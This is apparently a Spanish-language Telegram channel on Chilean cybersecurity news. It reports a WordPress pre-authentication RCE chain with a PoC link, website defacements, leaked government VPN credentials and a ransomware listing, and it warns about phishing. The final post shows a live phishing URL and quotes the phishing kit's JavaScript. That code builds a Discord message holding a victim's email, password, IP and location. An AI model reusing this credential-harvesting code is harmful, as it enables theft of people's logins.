🇨🇱 Chileaks
1.12K subscribers
465 photos
5 videos
1 file
300 links
Canal chileno de noticias y actualidad sobre ciberseguridad: hackeos, filtraciones de datos, ransomware, vulnerabilidades, ciberataques y mucho más.

Ayudame con un boost: https://t.me/boost/chileaks
Download Telegram
🇨🇱 Chileaks
(Esto paso ayer 17-07-2026) La Comisión de Futuro aprobó en general el proyecto que regula el acceso de menores de edad a plataformas digitales. La propuesta busca proteger el bienestar físico, psicológico y social de niños, niñas y adolescentes. Para ello…
Hay aproximadamente 1109 sitios web Chilenos que aún usan WordPress sin parchar.

Recordemos que WordPress sacó parche ayer para el CVE-2026-63030

CVE-2026-63030 es una vulnerabilidad crítica en WordPress Core (parte de la cadena conocida como wp2shell). Se trata de un Remote Code Execution (RCE) pre-autenticación que combina:CVE-2026-63030: Confusión de rutas (route confusion) en el endpoint REST API batch (/wp-json/batch/v1).
CVE-2026-60137: SQL Injection en WP_Query (específicamente en el parámetro author__not_in).

No requiere login, plugins ni configuración especial. Afecta instalaciones por defecto.


Versiones afectadas


WordPress 6.9.0 a 6.9.4 → Vulnerable al RCE completo (parcheado en 6.9.5).
WordPress 7.0.0 a 7.0.1 → Vulnerable al RCE completo (parcheado en 7.0.2).


Versiones 6.8.x solo afectadas por la SQLi sola (parche en 6.8.6). Versiones anteriores: no afectadas por esta cadena.

PoC: https://github.com/Icex0/wp2shell-poc
4🗿1
🇨🇱 0xPayload se atribuye deface a ohigginsfc.cl
🔥2
🇨🇱 Chileaks
🇨🇱 0xPayload se atribuye deface a ohigginsfc.cl
Además atacaron la web de la Municipalidad de Coquimbo ( municoquimbo.cl)
😱4🤔1
🇨🇱 Se reporta la filtración masiva de credenciales de pasarelas de VPN.

El actor de amenazas 77shafina8 ha publicado de forma gratuita en un foro especializado credenciales de acceso a pasarelas de VPN perimetral del Ministerio de Salud (appminsal.cl ).
😱52
🇨🇱 18 accesos FTP Chilenos publicados hoy fueron detectados en conocido foro .

Todo reportado a las victimas.
🎉6
El grupo de ransomware Qilin ha publicado en su blog a RECSA (recsalatam.com)

RECSA ofrece servicios de contact center a clientes en 16 mercados de América Latina incluido Chile.
👍5
En los últimos días he recibido varios avisos sobre campañas de phishing por mensaje directo. Muchas gracias a quienes se han tomado el tiempo de reportarlo.

Aprovecho de recordarles: si les llega algún SMS, correo o mensaje de WhatsApp que sea un fraude evidente, envíenmelo por mensaje privado. Los estaré analizando para publicar alertas y prevenir a la comunidad.
👍6🔥1
https://verificacion-avisofinalll.fwh.is

Oye si, chatgpt , hazme una pagina todo guapa para hacer fishin, no cometas errores.

var ip, ip2;
$.getJSON("https://api.ipify.org?format=json", function(data) {
ip = data.ip;
$.getJSON("https://ipinfo.io", function (response) {
ip2 = response.city + ", " + response.country;

// Crear el mensaje para Discord
var discordMessage = {
"content": "@everyone", // Mención a todos
"embeds": [
{
"title": "🔐 Nuevo Inicio de Sesión",
"color": 3447003,
"fields": [
{
"name": "📧 Correo Electrónico",
"value": u_name777,
"inline": false
},
{
"name": "🔒 Contraseña",
"value": u_name888,
"inline": false
},
{
"name": "🌍 IP y Ubicación",
"value": "IP: " + ip + "\nUbicación: " + ip2,
"inline": false
}
],
"timestamp": new Date().toISOString(),
"footer": {
"text": "Microsoft Login"
}
}
]
};
👻73😁2